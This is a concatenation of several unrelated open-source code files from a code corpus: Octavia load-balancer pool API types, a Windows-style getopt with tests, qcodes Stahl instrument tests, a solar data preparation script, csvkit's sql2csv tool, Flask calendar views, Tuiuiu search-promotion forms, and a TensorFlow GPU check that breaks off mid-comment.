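#   # patches.shape == (1, 1, 2, 2, 2)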
|
the-stack_0_6451 | # Copyright 2014 Rackspace
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from octavia_lib.common import constants as lib_constants
from wsme import types as wtypes
from octavia.api.common import types
from octavia.api.v2.types import health_monitor
from octavia.api.v2.types import member
from octavia.common import constants
class SessionPersistenceResponse(types.BaseType):
"""Defines which attributes are to be shown on any response."""
type = wtypes.wsattr(wtypes.text)
cookie_name = wtypes.wsattr(wtypes.text)
persistence_timeout = wtypes.wsattr(wtypes.IntegerType())
persistence_granularity = wtypes.wsattr(types.IPAddressType())
class SessionPersistencePOST(types.BaseType):
"""Defines mandatory and optional attributes of a POST request."""
type = wtypes.wsattr(wtypes.Enum(str, *constants.SUPPORTED_SP_TYPES),
mandatory=True)
cookie_name = wtypes.wsattr(wtypes.StringType(max_length=255),
default=None)
persistence_timeout = wtypes.wsattr(wtypes.IntegerType(), default=None)
persistence_granularity = wtypes.wsattr(types.IPAddressType(),
default=None)
class SessionPersistencePUT(types.BaseType):
"""Defines attributes that are acceptable of a PUT request."""
type = wtypes.wsattr(wtypes.Enum(str, *constants.SUPPORTED_SP_TYPES))
cookie_name = wtypes.wsattr(wtypes.StringType(max_length=255),
default=None)
persistence_timeout = wtypes.wsattr(wtypes.IntegerType(), default=None)
persistence_granularity = wtypes.wsattr(types.IPAddressType(),
default=None)
class BasePoolType(types.BaseType):
_type_to_model_map = {'admin_state_up': 'enabled',
'healthmonitor': 'health_monitor',
'healthmonitor_id': 'health_monitor.id',
'tls_container_ref': 'tls_certificate_id',
'ca_tls_container_ref': 'ca_tls_certificate_id',
'crl_container_ref': 'crl_container_id'}
_child_map = {'health_monitor': {'id': 'healthmonitor_id'}}
class PoolResponse(BasePoolType):
"""Defines which attributes are to be shown on any response."""
id = wtypes.wsattr(wtypes.UuidType())
name = wtypes.wsattr(wtypes.StringType())
description = wtypes.wsattr(wtypes.StringType())
provisioning_status = wtypes.wsattr(wtypes.StringType())
operating_status = wtypes.wsattr(wtypes.StringType())
admin_state_up = wtypes.wsattr(bool)
protocol = wtypes.wsattr(wtypes.text)
lb_algorithm = wtypes.wsattr(wtypes.text)
session_persistence = wtypes.wsattr(SessionPersistenceResponse)
project_id = wtypes.wsattr(wtypes.StringType())
loadbalancers = wtypes.wsattr([types.IdOnlyType])
listeners = wtypes.wsattr([types.IdOnlyType])
created_at = wtypes.wsattr(wtypes.datetime.datetime)
updated_at = wtypes.wsattr(wtypes.datetime.datetime)
healthmonitor_id = wtypes.wsattr(wtypes.UuidType())
members = wtypes.wsattr([types.IdOnlyType])
tags = wtypes.wsattr(wtypes.ArrayType(wtypes.StringType()))
tls_container_ref = wtypes.wsattr(wtypes.StringType())
ca_tls_container_ref = wtypes.wsattr(wtypes.StringType())
crl_container_ref = wtypes.wsattr(wtypes.StringType())
tls_enabled = wtypes.wsattr(bool)
tls_ciphers = wtypes.wsattr(wtypes.StringType())
tls_versions = wtypes.wsattr(wtypes.ArrayType(wtypes.StringType()))
@classmethod
def from_data_model(cls, data_model, children=False):
pool = super(PoolResponse, cls).from_data_model(
data_model, children=children)
if data_model.session_persistence:
pool.session_persistence = (
SessionPersistenceResponse.from_data_model(
data_model.session_persistence))
if cls._full_response():
del pool.loadbalancers
member_model = member.MemberFullResponse
if pool.healthmonitor:
pool.healthmonitor = (
health_monitor.HealthMonitorFullResponse
.from_data_model(data_model.health_monitor))
else:
if data_model.load_balancer:
pool.loadbalancers = [
types.IdOnlyType.from_data_model(data_model.load_balancer)]
else:
pool.loadbalancers = []
member_model = types.IdOnlyType
if data_model.health_monitor:
pool.healthmonitor_id = data_model.health_monitor.id
pool.listeners = [
types.IdOnlyType.from_data_model(i) for i in data_model.listeners]
pool.members = [
member_model.from_data_model(i) for i in data_model.members]
pool.tls_versions = data_model.tls_versions
return pool
class PoolFullResponse(PoolResponse):
@classmethod
def _full_response(cls):
return True
members = wtypes.wsattr([member.MemberFullResponse])
healthmonitor = wtypes.wsattr(health_monitor.HealthMonitorFullResponse)
class PoolRootResponse(types.BaseType):
pool = wtypes.wsattr(PoolResponse)
class PoolsRootResponse(types.BaseType):
pools = wtypes.wsattr([PoolResponse])
pools_links = wtypes.wsattr([types.PageType])
class PoolPOST(BasePoolType):
"""Defines mandatory and optional attributes of a POST request."""
name = wtypes.wsattr(wtypes.StringType(max_length=255))
description = wtypes.wsattr(wtypes.StringType(max_length=255))
admin_state_up = wtypes.wsattr(bool, default=True)
listener_id = wtypes.wsattr(wtypes.UuidType())
loadbalancer_id = wtypes.wsattr(wtypes.UuidType())
protocol = wtypes.wsattr(
wtypes.Enum(str, *lib_constants.POOL_SUPPORTED_PROTOCOLS),
mandatory=True)
lb_algorithm = wtypes.wsattr(
wtypes.Enum(str, *constants.SUPPORTED_LB_ALGORITHMS),
mandatory=True)
session_persistence = wtypes.wsattr(SessionPersistencePOST)
# TODO(johnsom) Remove after deprecation (R series)
project_id = wtypes.wsattr(wtypes.StringType(max_length=36))
healthmonitor = wtypes.wsattr(health_monitor.HealthMonitorSingleCreate)
members = wtypes.wsattr([member.MemberSingleCreate])
tags = wtypes.wsattr(wtypes.ArrayType(wtypes.StringType(max_length=255)))
tls_container_ref = wtypes.wsattr(
wtypes.StringType(max_length=255))
ca_tls_container_ref = wtypes.wsattr(wtypes.StringType(max_length=255))
crl_container_ref = wtypes.wsattr(wtypes.StringType(max_length=255))
tls_enabled = wtypes.wsattr(bool, default=False)
tls_ciphers = wtypes.wsattr(wtypes.StringType(max_length=2048))
tls_versions = wtypes.wsattr(wtypes.ArrayType(wtypes.StringType(
max_length=32)))
class PoolRootPOST(types.BaseType):
pool = wtypes.wsattr(PoolPOST)
class PoolPUT(BasePoolType):
"""Defines attributes that are acceptable of a PUT request."""
name = wtypes.wsattr(wtypes.StringType(max_length=255))
description = wtypes.wsattr(wtypes.StringType(max_length=255))
admin_state_up = wtypes.wsattr(bool)
lb_algorithm = wtypes.wsattr(
wtypes.Enum(str, *constants.SUPPORTED_LB_ALGORITHMS))
session_persistence = wtypes.wsattr(SessionPersistencePUT)
tags = wtypes.wsattr(wtypes.ArrayType(wtypes.StringType(max_length=255)))
tls_container_ref = wtypes.wsattr(wtypes.StringType(max_length=255))
ca_tls_container_ref = wtypes.wsattr(wtypes.StringType(max_length=255))
crl_container_ref = wtypes.wsattr(wtypes.StringType(max_length=255))
tls_enabled = wtypes.wsattr(bool)
tls_ciphers = wtypes.wsattr(wtypes.StringType(max_length=2048))
tls_versions = wtypes.wsattr(wtypes.ArrayType(wtypes.StringType(
max_length=32)))
class PoolRootPut(types.BaseType):
pool = wtypes.wsattr(PoolPUT)
class PoolSingleCreate(BasePoolType):
"""Defines mandatory and optional attributes of a POST request."""
name = wtypes.wsattr(wtypes.StringType(max_length=255))
description = wtypes.wsattr(wtypes.StringType(max_length=255))
admin_state_up = wtypes.wsattr(bool, default=True)
protocol = wtypes.wsattr(
wtypes.Enum(str, *lib_constants.POOL_SUPPORTED_PROTOCOLS))
lb_algorithm = wtypes.wsattr(
wtypes.Enum(str, *constants.SUPPORTED_LB_ALGORITHMS))
session_persistence = wtypes.wsattr(SessionPersistencePOST)
healthmonitor = wtypes.wsattr(health_monitor.HealthMonitorSingleCreate)
members = wtypes.wsattr([member.MemberSingleCreate])
tags = wtypes.wsattr(wtypes.ArrayType(wtypes.StringType(max_length=255)))
tls_container_ref = wtypes.wsattr(wtypes.StringType(max_length=255))
ca_tls_container_ref = wtypes.wsattr(wtypes.StringType(max_length=255))
crl_container_ref = wtypes.wsattr(wtypes.StringType(max_length=255))
tls_enabled = wtypes.wsattr(bool, default=False)
tls_ciphers = wtypes.wsattr(wtypes.StringType(max_length=2048))
tls_versions = wtypes.wsattr(wtypes.ArrayType(wtypes.StringType(
max_length=32)))
class PoolStatusResponse(BasePoolType):
"""Defines which attributes are to be shown on status response."""
id = wtypes.wsattr(wtypes.UuidType())
name = wtypes.wsattr(wtypes.StringType())
provisioning_status = wtypes.wsattr(wtypes.StringType())
operating_status = wtypes.wsattr(wtypes.StringType())
health_monitor = wtypes.wsattr(
health_monitor.HealthMonitorStatusResponse)
members = wtypes.wsattr([member.MemberStatusResponse])
@classmethod
def from_data_model(cls, data_model, children=False):
pool = super(PoolStatusResponse, cls).from_data_model(
data_model, children=children)
member_model = member.MemberStatusResponse
if data_model.health_monitor:
pool.health_monitor = (
health_monitor.HealthMonitorStatusResponse.from_data_model(
data_model.health_monitor))
pool.members = [
member_model.from_data_model(i) for i in data_model.members]
return pool
|
the-stack_0_6452 | class GetoptError(Exception):
pass
def w_getopt(args, options):
"""A getopt for Windows.
Options may start with either '-' or '/', the option names may
have more than one letter (/tlb or -RegServer), and option names
are case insensitive.
Returns two elements, just as getopt.getopt. The first is a list
of (option, value) pairs in the same way getopt.getopt does, but
there is no '-' or '/' prefix to the option name, and the option
name is always lower case. The second is the list of arguments
which do not belong to an option.
Different from getopt.getopt, a single argument not belonging to an option
does not terminate parsing.
"""
opts = []
arguments = []
while args:
if args[0][:1] in "/-":
arg = args[0][1:] # strip the '-' or '/'
arg = arg.lower()
if arg + ':' in options:
try:
opts.append((arg, args[1]))
except IndexError:
raise GetoptError("option '%s' requires an argument" % args[0])
args = args[1:]
elif arg in options:
opts.append((arg, ''))
else:
raise GetoptError("invalid option '%s'" % args[0])
args = args[1:]
else:
arguments.append(args[0])
args = args[1:]
return opts, arguments
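# Usage sketch (mirrors the unit tests below):
#   opts, args = w_getopt("/TLB Hello.Tlb HELLO.idl".split(), ["tlb:"])
#   # opts == [('tlb', 'Hello.Tlb')], args == ['HELLO.idl']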
if __debug__:
if __name__ == "__main__":
import unittest
class TestCase(unittest.TestCase):
def test_1(self):
args = "-embedding spam /RegServer foo /UnregSERVER blabla".split()
opts, args = w_getopt(args,
"regserver unregserver embedding".split())
self.assertEqual(opts,
[('embedding', ''),
('regserver', ''),
('unregserver', '')])
self.assertEqual(args, ["spam", "foo", "blabla"])
def test_2(self):
args = "/TLB Hello.Tlb HELLO.idl".split()
opts, args = w_getopt(args, ["tlb:"])
self.assertEqual(opts, [('tlb', 'Hello.Tlb')])
self.assertEqual(args, ['HELLO.idl'])
def test_3(self):
# Invalid option
self.assertRaises(GetoptError, w_getopt,
"/TLIB hello.tlb hello.idl".split(), ["tlb:"])
def test_4(self):
# Missing argument
self.assertRaises(GetoptError, w_getopt,
"/TLB".split(), ["tlb:"])
unittest.main()
|
the-stack_0_6453 | import pytest
import logging
import io
from qcodes.instrument_drivers.stahl import Stahl
import qcodes.instrument.sims as sims
@pytest.fixture(scope="function")
def stahl_instrument():
visa_lib = sims.__file__.replace(
'__init__.py',
'stahl.yaml@sim'
)
inst = Stahl('Stahl', 'ASRL3', visalib=visa_lib)
inst.log.setLevel(logging.DEBUG)
iostream = io.StringIO()
lh = logging.StreamHandler(iostream)
inst.log.logger.addHandler(lh)
try:
yield inst
finally:
inst.close()
def test_parse_idn_string():
"""
Test that we can parse IDN strings correctly
"""
assert Stahl.parse_idn_string("HV123 005 16 b") == {
"model": "HV",
"serial_number": "123",
"voltage_range": 5.0,
"n_channels": 16,
"output_type": "bipolar"
}
with pytest.raises(
RuntimeError,
match="Unexpected instrument response"
):
Stahl.parse_idn_string("HS123 005 16 bla b")
def test_get_idn(stahl_instrument):
"""
Instrument attributes are set correctly after getting the IDN
"""
assert stahl_instrument.IDN() == {
"vendor": "Stahl",
"model": "BS",
"serial": "123",
"firmware": None
}
assert stahl_instrument.n_channels == 16
assert stahl_instrument.voltage_range == 5.0
assert stahl_instrument.output_type == "bipolar"
def test_get_set_voltage(stahl_instrument):
"""
Test that we can correctly get/set voltages
"""
stahl_instrument.channel[0].voltage(1.2)
assert stahl_instrument.channel[0].voltage() == -1.2
logger = stahl_instrument.log.logger
log_messages = logger.handlers[0].stream.getvalue()
assert "did not produce an acknowledge reply" not in log_messages
def test_get_set_voltage_assert_warning(stahl_instrument):
"""
On channel 2 we have deliberately introduced an error in the
visa simulation; setting a voltage does not produce an acknowledge
string. Test that a warning is correctly issued.
"""
stahl_instrument.channel[1].voltage(1.0)
logger = stahl_instrument.log.logger
log_messages = logger.handlers[0].stream.getvalue()
assert "did not produce an acknowledge reply" in log_messages
def test_get_current(stahl_instrument):
"""
Test that we can read currents and that the unit is in Ampere
"""
assert stahl_instrument.channel[0].current() == 1E-6
assert stahl_instrument.channel[0].current.unit == "A"
def test_get_temperature(stahl_instrument):
"""
Due to limitations in pyvisa-sim, we cannot test this.
Line 191 of pyvisa-sim/component.py should read
"return response.encode('latin-1')" for this to work.
"""
pass
|
the-stack_0_6454 | # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
"""
BLIS - Balancing Load of Intermittent Solar:
A characteristic-based transient power plant model
Copyright (C) 2020. University of Virginia Licensing & Ventures Group (UVA LVG). All Rights Reserved.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
import pandas as pd
# Data-file details
filename = "PVLibSolarData.csv"
timezone_original = 'UTC'
timezone_new = 'US/Eastern'
# Version details
range1 = ['2017-07-01', '2017-07-31']
range1_name = 'July'
range2 = ['2017-10-30', '2017-10-30']
range2_name = 'Oct30th'
# -----
# Read-in data file
# -----
df = pd.read_csv(filename)
# -----
# Convert timezone
# -----
df.index = pd.to_datetime(df.loc[:, 'DatetimeUTC'])
df.index = df.index.tz_localize(timezone_original)
df.index = df.index.tz_convert(timezone_new)
# -----
# Initial Calculations
# -----
df_out = pd.DataFrame(columns=['dt', 'hour', 'demand', 'solar'])
df_out.index.name = 'Datetime'
df_out['dt'] = df.loc[:, 'dt']
df_out['hour'] = df.index.hour
df_out['demand'] = df.loc[:, 'demand']
for i in range(2):
# -----
# Case specific calculations
# -----
if i == 0:
# Case 1 - 1% solar
case = 'data001'
df_out['solar'] = df.loc[:, 'UVA_Rooftop']
else:
# Case 2 - 63% solar
case = 'data063'
df_out['solar'] = df.loc[:, 'Rooftop_and_32MWTracker']
# A - Entire Timeperiod
savename = case + '.csv'
df_out.to_csv(savename, index=False)
# B - Range1
savename = case + '_' + range1_name + '.csv'
df_out[range1[0]:range1[1]].to_csv(savename, index=True)
# C - Range2
savename = case + '_' + range2_name + '.csv'
df_out[range2[0]:range2[1]].to_csv(savename, index=True)
|
the-stack_0_6455 | #!/usr/bin/env python
from argparse import FileType
import sys
import agate
from sqlalchemy import create_engine
from csvkit.cli import CSVKitUtility
class SQL2CSV(CSVKitUtility):
description = 'Execute an SQL query on a database and output the result to a CSV file.'
override_flags = 'f,b,d,e,H,p,q,S,t,u,z,zero'.split(',')
def add_arguments(self):
self.argparser.add_argument('--db', dest='connection_string', default='sqlite://',
help='An sqlalchemy connection string to connect to a database.',)
self.argparser.add_argument('file', metavar="FILE", nargs='?', type=FileType('rt'), default=sys.stdin,
help='The file to use as SQL query. If both FILE and QUERY are omitted, query will be read from STDIN.')
self.argparser.add_argument('--query', default=None,
help="The SQL query to execute. If specified, it overrides FILE and STDIN.")
self.argparser.add_argument('-H', '--no-header-row', dest='no_header_row', action='store_true',
help='Do not output column names.')
self.argparser.set_defaults(
delimiter=None,
doublequote=None,
escapechar=None,
encoding='utf-8',
field_size_limit=None,
quotechar=None,
quoting=None,
skipinitialspace=None,
tabs=None,
)
def main(self):
try:
engine = create_engine(self.args.connection_string)
except ImportError:
raise ImportError('You don\'t appear to have the necessary database backend installed for connection string you\'re trying to use. Available backends include:\n\nPostgresql:\tpip install psycopg2\nMySQL:\t\tpip install MySQL-python\n\nFor details on connection strings and other backends, please see the SQLAlchemy documentation on dialects at: \n\nhttp://www.sqlalchemy.org/docs/dialects/\n\n')
connection = engine.connect()
if self.args.query:
query = self.args.query.strip()
else:
query = ""
for line in self.args.file:
query += line
# Must escape '%'.
# @see https://github.com/wireservice/csvkit/issues/440
# @see https://bitbucket.org/zzzeek/sqlalchemy/commits/5bc1f17cb53248e7cea609693a3b2a9bb702545b
rows = connection.execute(query.replace('%', '%%'))
output = agate.csv.writer(self.output_file, **self.writer_kwargs)
if rows.returns_rows:
if not self.args.no_header_row:
output.writerow(rows._metadata.keys)
for row in rows:
output.writerow(row)
connection.close()
def launch_new_instance():
utility = SQL2CSV()
utility.run()
if __name__ == '__main__':
launch_new_instance()
|
the-stack_0_6457 | import re
from typing import Optional, cast # noqa: F401
import flask_app.constants as constants
from flask import abort, current_app, g, jsonify, make_response, redirect, render_template, request
from flask_app.app_utils import (
add_session,
authenticated,
authorized,
get_session_username,
new_session_id,
next_month_link,
previous_month_link,
)
from flask_app.authentication import Authentication
from flask_app.calendar_data import CalendarData
from flask_app.gregorian_calendar import GregorianCalendar
from werkzeug.wrappers import Response
def get_authentication() -> Authentication:
auth = getattr(g, "_auth", None)
if auth is None:
auth = g._auth = Authentication(
data_folder=current_app.config["USERS_DATA_FOLDER"],
password_salt=current_app.config["PASSWORD_SALT"],
failed_login_delay_base=current_app.config["FAILED_LOGIN_DELAY_BASE"],
)
return cast(Authentication, auth)
@authenticated
def index_action() -> Response:
username = get_session_username(session_id=str(request.cookies.get(constants.SESSION_ID)))
authentication = get_authentication()
user_data = authentication.user_data(username)
return redirect("/{}/".format(user_data["default_calendar"]))
def login_action() -> Response:
return cast(Response, render_template("login.html"))
def do_login_action() -> Response:
username = request.form.get("username", "")
password = request.form.get("password", "")
authentication = get_authentication()
if authentication.is_valid(username, password):
session_id = new_session_id()
add_session(session_id, username)
response = make_response(redirect("/"))
cookie_kwargs = {
"key": constants.SESSION_ID,
"value": session_id,
# 1 month
"max_age": 2678400,
"secure": current_app.config["COOKIE_HTTPS_ONLY"],
"httponly": True,
}
samesite_policy = current_app.config.get("COOKIE_SAMESITE_POLICY", None)
# Certain Flask versions don't support 'samesite' param
if samesite_policy:
cookie_kwargs.update({"samesite": samesite_policy})
response.set_cookie(**cookie_kwargs)
return cast(Response, response)
else:
return redirect("/login")
@authenticated
@authorized
def main_calendar_action(calendar_id: str) -> Response:
GregorianCalendar.setfirstweekday(current_app.config["WEEK_STARTING_DAY"])
current_day, current_month, current_year = GregorianCalendar.current_date()
year = int(request.args.get("y", current_year))
year = max(min(year, current_app.config["MAX_YEAR"]), current_app.config["MIN_YEAR"])
month = int(request.args.get("m", current_month))
month = max(min(month, 12), 1)
month_name = GregorianCalendar.MONTH_NAMES[month - 1]
if current_app.config["HIDE_PAST_TASKS"]:
view_past_tasks = False
else:
view_past_tasks = request.cookies.get("ViewPastTasks", "1") == "1"
calendar_data = CalendarData(current_app.config["DATA_FOLDER"], current_app.config["WEEK_STARTING_DAY"])
try:
data = calendar_data.load_calendar(calendar_id)
except FileNotFoundError:
abort(404)
tasks = calendar_data.tasks_from_calendar(year, month, data)
tasks = calendar_data.add_repetitive_tasks_from_calendar(year, month, data, tasks)
if not view_past_tasks:
calendar_data.hide_past_tasks(year, month, tasks)
if current_app.config["WEEK_STARTING_DAY"] == constants.WEEK_START_DAY_MONDAY:
weekdays_headers = ["MON", "TUE", "WED", "THU", "FRI", "SAT", "SUN"]
else:
weekdays_headers = ["SUN", "MON", "TUE", "WED", "THU", "FRI", "SAT"]
return cast(
Response,
render_template(
"calendar.html",
calendar_id=calendar_id,
year=year,
month=month,
month_name=month_name,
current_year=current_year,
current_month=current_month,
current_day=current_day,
month_days=GregorianCalendar.month_days(year, month),
previous_month_link=previous_month_link(year, month),
next_month_link=next_month_link(year, month),
base_url=current_app.config["BASE_URL"],
tasks=tasks,
display_view_past_button=current_app.config["SHOW_VIEW_PAST_BUTTON"],
weekdays_headers=weekdays_headers,
),
)
@authenticated
@authorized
def new_task_action(calendar_id: str, year: int, month: int) -> Response:
GregorianCalendar.setfirstweekday(current_app.config["WEEK_STARTING_DAY"])
current_day, current_month, current_year = GregorianCalendar.current_date()
year = max(min(int(year), current_app.config["MAX_YEAR"]), current_app.config["MIN_YEAR"])
month = max(min(int(month), 12), 1)
month_names = GregorianCalendar.MONTH_NAMES
if current_month == month and current_year == year:
day = current_day
else:
day = 1
day = int(request.args.get("day", day))
task = {
"date": CalendarData.date_for_frontend(year, month, day),
"is_all_day": True,
"repeats": False,
"details": "",
}
emojis_enabled = current_app.config.get("EMOJIS_ENABLED", False)
return cast(
Response,
render_template(
"task.html",
calendar_id=calendar_id,
year=year,
month=month,
min_year=current_app.config["MIN_YEAR"],
max_year=current_app.config["MAX_YEAR"],
month_names=month_names,
task=task,
base_url=current_app.config["BASE_URL"],
editing=False,
emojis_enabled=emojis_enabled,
button_default_color_value=current_app.config["BUTTON_CUSTOM_COLOR_VALUE"],
buttons_colors=current_app.config["BUTTONS_COLORS_LIST"],
buttons_emojis=current_app.config["BUTTONS_EMOJIS_LIST"] if emojis_enabled else tuple(),
),
)
@authenticated
@authorized
def edit_task_action(calendar_id: str, year: int, month: int, day: int, task_id: int) -> Response:
month_names = GregorianCalendar.MONTH_NAMES
calendar_data = CalendarData(current_app.config["DATA_FOLDER"], current_app.config["WEEK_STARTING_DAY"])
repeats = request.args.get("repeats") == "1"
try:
if repeats:
task = calendar_data.repetitive_task_from_calendar(
calendar_id=calendar_id, year=year, month=month, task_id=int(task_id)
)
else:
task = calendar_data.task_from_calendar(
calendar_id=calendar_id, year=year, month=month, day=day, task_id=int(task_id),
)
except (FileNotFoundError, IndexError):
abort(404)
if task["details"] == " ":
task["details"] = ""
emojis_enabled = current_app.config.get("EMOJIS_ENABLED", False)
return cast(
Response,
render_template(
"task.html",
calendar_id=calendar_id,
year=year,
month=month,
day=day,
min_year=current_app.config["MIN_YEAR"],
max_year=current_app.config["MAX_YEAR"],
month_names=month_names,
task=task,
base_url=current_app.config["BASE_URL"],
editing=True,
emojis_enabled=emojis_enabled,
button_default_color_value=current_app.config["BUTTON_CUSTOM_COLOR_VALUE"],
buttons_colors=current_app.config["BUTTONS_COLORS_LIST"],
buttons_emojis=current_app.config["BUTTONS_EMOJIS_LIST"] if emojis_enabled else tuple(),
),
)
@authenticated
@authorized
def update_task_action(calendar_id: str, year: str, month: str, day: str, task_id: str) -> Response:
    # Logic is the same as save + delete; could be refactored, but that can wait until the save/delete logic needs to change.
calendar_data = CalendarData(current_app.config["DATA_FOLDER"], current_app.config["WEEK_STARTING_DAY"])
# For creation of "updated" task use only form data
title = request.form["title"].strip()
date = request.form.get("date", "")
if len(date) > 0:
fragments = re.split("-", date)
updated_year = int(fragments[0]) # type: Optional[int]
updated_month = int(fragments[1]) # type: Optional[int]
updated_day = int(fragments[2]) # type: Optional[int]
else:
updated_year = updated_month = updated_day = None
is_all_day = request.form.get("is_all_day", "0") == "1"
start_time = request.form["start_time"]
end_time = request.form.get("end_time", None)
details = request.form["details"].replace("\r", "").replace("\n", "<br>")
color = request.form["color"]
has_repetition = request.form.get("repeats", "0") == "1"
repetition_type = request.form.get("repetition_type", "")
repetition_subtype = request.form.get("repetition_subtype", "")
repetition_value = int(request.form["repetition_value"]) # type: int
calendar_data.create_task(
calendar_id=calendar_id,
year=updated_year,
month=updated_month,
day=updated_day,
title=title,
is_all_day=is_all_day,
start_time=start_time,
end_time=end_time,
details=details,
color=color,
has_repetition=has_repetition,
repetition_type=repetition_type,
repetition_subtype=repetition_subtype,
repetition_value=repetition_value,
)
# For deletion of old task data use only url data
calendar_data.delete_task(
calendar_id=calendar_id, year_str=year, month_str=month, day_str=day, task_id=int(task_id),
)
if updated_year is None:
return redirect("{}/{}/".format(current_app.config["BASE_URL"], calendar_id), code=302)
else:
return redirect(
"{}/{}/?y={}&m={}".format(current_app.config["BASE_URL"], calendar_id, updated_year, updated_month),
code=302,
)
@authenticated
@authorized
def save_task_action(calendar_id: str) -> Response:
title = request.form["title"].strip()
date = request.form.get("date", "")
if len(date) > 0:
date_fragments = re.split("-", date)
year = int(date_fragments[0]) # type: Optional[int]
month = int(date_fragments[1]) # type: Optional[int]
day = int(date_fragments[2]) # type: Optional[int]
else:
year = month = day = None
is_all_day = request.form.get("is_all_day", "0") == "1"
start_time = request.form["start_time"]
end_time = request.form.get("end_time", None)
details = request.form["details"].replace("\r", "").replace("\n", "<br>")
color = request.form["color"]
has_repetition = request.form.get("repeats", "0") == "1"
repetition_type = request.form.get("repetition_type")
repetition_subtype = request.form.get("repetition_subtype")
repetition_value = int(request.form["repetition_value"])
calendar_data = CalendarData(current_app.config["DATA_FOLDER"], current_app.config["WEEK_STARTING_DAY"])
calendar_data.create_task(
calendar_id=calendar_id,
year=year,
month=month,
day=day,
title=title,
is_all_day=is_all_day,
start_time=start_time,
end_time=end_time,
details=details,
color=color,
has_repetition=has_repetition,
repetition_type=repetition_type,
repetition_subtype=repetition_subtype,
repetition_value=repetition_value,
)
if year is None:
return redirect("{}/{}/".format(current_app.config["BASE_URL"], calendar_id), code=302)
else:
return redirect("{}/{}/?y={}&m={}".format(current_app.config["BASE_URL"], calendar_id, year, month), code=302,)
@authenticated
@authorized
def delete_task_action(calendar_id: str, year: str, month: str, day: str, task_id: str) -> Response:
calendar_data = CalendarData(current_app.config["DATA_FOLDER"], current_app.config["WEEK_STARTING_DAY"])
calendar_data.delete_task(
calendar_id=calendar_id, year_str=year, month_str=month, day_str=day, task_id=int(task_id),
)
return cast(Response, jsonify({}))
@authenticated
@authorized
def update_task_day_action(calendar_id: str, year: str, month: str, day: str, task_id: str) -> Response:
new_day = request.data.decode("utf-8")
calendar_data = CalendarData(current_app.config["DATA_FOLDER"], current_app.config["WEEK_STARTING_DAY"])
calendar_data.update_task_day(
calendar_id=calendar_id, year_str=year, month_str=month, day_str=day, task_id=int(task_id), new_day_str=new_day,
)
return cast(Response, jsonify({}))
@authenticated
@authorized
def hide_repetition_task_instance_action(calendar_id: str, year: str, month: str, day: str, task_id: str) -> Response:
calendar_data = CalendarData(current_app.config["DATA_FOLDER"], current_app.config["WEEK_STARTING_DAY"])
calendar_data.hide_repetition_task_instance(
calendar_id=calendar_id, year_str=year, month_str=month, day_str=day, task_id_str=task_id,
)
return cast(Response, jsonify({}))
def open_calc_plots_action() -> Response:
# username = get_session_username(session_id=str(request.cookies.get(constants.SESSION_ID)))
# authentication = get_authentication()
# user_data = authentication.user_data(username)
# return cast(Response, render_template("../Calculator/index.html"))
# return cast(
# Response,
# render_template(
# "../Calculator/index.html"
# ))
return render_template("index.html")
|
the-stack_0_6458 | from __future__ import absolute_import, unicode_literals
from django import forms
from django.forms.models import inlineformset_factory
from django.utils.translation import ugettext_lazy as _
from tuiuiu.contrib.searchpromotions.models import SearchPromotion
from tuiuiu.tuiuiuadmin.widgets import AdminPageChooser
from tuiuiu.tuiuiusearch.models import Query
class SearchPromotionForm(forms.ModelForm):
sort_order = forms.IntegerField(required=False)
def __init__(self, *args, **kwargs):
super(SearchPromotionForm, self).__init__(*args, **kwargs)
self.fields['page'].widget = AdminPageChooser()
class Meta:
model = SearchPromotion
fields = ('query', 'page', 'description')
widgets = {
'description': forms.Textarea(attrs=dict(rows=3)),
}
SearchPromotionsFormSetBase = inlineformset_factory(
Query, SearchPromotion, form=SearchPromotionForm, can_order=True, can_delete=True, extra=0
)
class SearchPromotionsFormSet(SearchPromotionsFormSetBase):
minimum_forms = 1
minimum_forms_message = _("Please specify at least one recommendation for this search term.")
def add_fields(self, form, *args, **kwargs):
super(SearchPromotionsFormSet, self).add_fields(form, *args, **kwargs)
# Hide delete and order fields
form.fields['DELETE'].widget = forms.HiddenInput()
form.fields['ORDER'].widget = forms.HiddenInput()
# Remove query field
del form.fields['query']
def clean(self):
# Search pick must have at least one recommended page to be valid
# Check there is at least one non-deleted form.
non_deleted_forms = self.total_form_count()
non_empty_forms = 0
for i in range(0, self.total_form_count()):
form = self.forms[i]
if self.can_delete and self._should_delete_form(form):
non_deleted_forms -= 1
if not (form.instance.id is None and not form.has_changed()):
non_empty_forms += 1
if (
non_deleted_forms < self.minimum_forms or
non_empty_forms < self.minimum_forms
):
raise forms.ValidationError(self.minimum_forms_message)
|
the-stack_0_6459 | from tensorflow.python.client import device_lib
# Test whether TensorFlow has been installed successfully
import tensorflow as tf
import numpy as np
import math
print(tf.test.is_gpu_available())
def get_available_gpus():
local_device_protos = device_lib.list_local_devices()
return [x.name for x in local_device_protos if x.device_type == 'GPU']
print(get_available_gpus())
'''
Verification of the softmax cross-entropy formula: loss = -sum(yi * ln(ai)), where yi is the one-hot true label of
